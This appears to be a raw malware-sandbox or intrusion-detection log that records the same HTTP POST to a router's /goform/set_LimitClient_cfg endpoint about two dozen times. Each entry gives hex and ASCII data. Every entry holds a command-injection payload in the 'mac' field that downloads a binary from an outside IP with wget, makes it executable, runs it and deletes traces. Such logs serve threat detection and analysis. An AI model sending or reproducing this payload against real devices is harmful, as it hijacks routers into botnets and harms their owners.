                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
